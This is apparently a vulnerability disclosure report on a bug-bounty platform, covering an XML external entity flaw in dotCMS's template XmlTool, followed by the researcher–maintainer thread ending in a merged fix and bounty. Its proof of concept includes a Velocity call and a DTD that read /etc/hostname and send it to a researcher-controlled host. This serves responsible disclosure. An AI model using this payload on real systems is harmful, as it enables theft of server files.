Improper Restriction of XML External Entity Reference in dotcms/core

Valid

Reported on

Dec 10th 2021


Description

Hello, dotCMS has an XXE vulnerability in the template design page. To exploit this flaw, a attacker needs the permission to edit and preview templates, and this can be abused to read internal files

Video Poc

This section of the documentation explain how to use the XMLTool in the template engine, this allow us to direct write xml content to the application

If we analyse the content of src\main\java\com\dotcms\rendering\velocity\viewtools\XmlTool.java on line 156 to 158 we find the following code

protected void parse(String xml) throws Exception {
    setRoot(DocumentHelper.parseText(xml));
}

If we analyse the documentation of dom4j (where does the DocumentHelper class come from) we found the following description to the parseText method

Loading external DTD and entities is disabled (if it is possible) for security reasons.

I don't know exactly why this is disable in your case (I am using your docker image) but its vulnerable to XXE, I recommend using only SaxReader instead of depending of a volatile class / method

Proof of Concept

#set($myXML = $xmltool.parse("<!DOCTYPE data SYSTEM 'http://172.27.32.51:1337/xxe.dtd'><data>&send;</data>"))

xxe.dtd

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://172.27.32.51:1337/?%file;'>">
%all;

Impact

File system read access

We are processing your report and will contact the dotcms/core team within 24 hours. 6 months ago
6 months ago
Vinicius
6 months ago

Researcher


Now there are 2 reports here, they have different root causes and different fix

Vinicius
6 months ago

Researcher


I expect they are treated as different

We have contacted a member of the dotcms/core team and are waiting to hear back 6 months ago
We have sent a follow up to the dotcms/core team. We will try again in 7 days. 5 months ago
We have sent a second follow up to the dotcms/core team. We will try again in 10 days. 5 months ago
We have sent a third and final follow up to the dotcms/core team. This report is now considered stale. 5 months ago
Will Ezell validated this vulnerability 5 months ago
Vinicius Ribeiro Ferreira da Silva has been awarded the disclosure bounty
The fix bounty is now up for grabs
Will Ezell
5 months ago

Maintainer


This is fixed here https://github.com/dotCMS/core/issues/21415

Vinicius
5 months ago

Researcher


Hi will, can I request a CVE for this flaw?

Vinicius
4 months ago

Researcher


Can we close this now?

Will Ezell confirmed that a fix has been merged on 0b6254 4 months ago
The fix bounty has been dropped
Will Ezell
4 months ago

Maintainer


Vinicius, I would like to pay you an additional bounty for your good work with our system. Please email me at will@dotcms.com for more details. Thanks!

Vinicius
4 months ago

Researcher


Thanks will, I send you a email

to join this conversation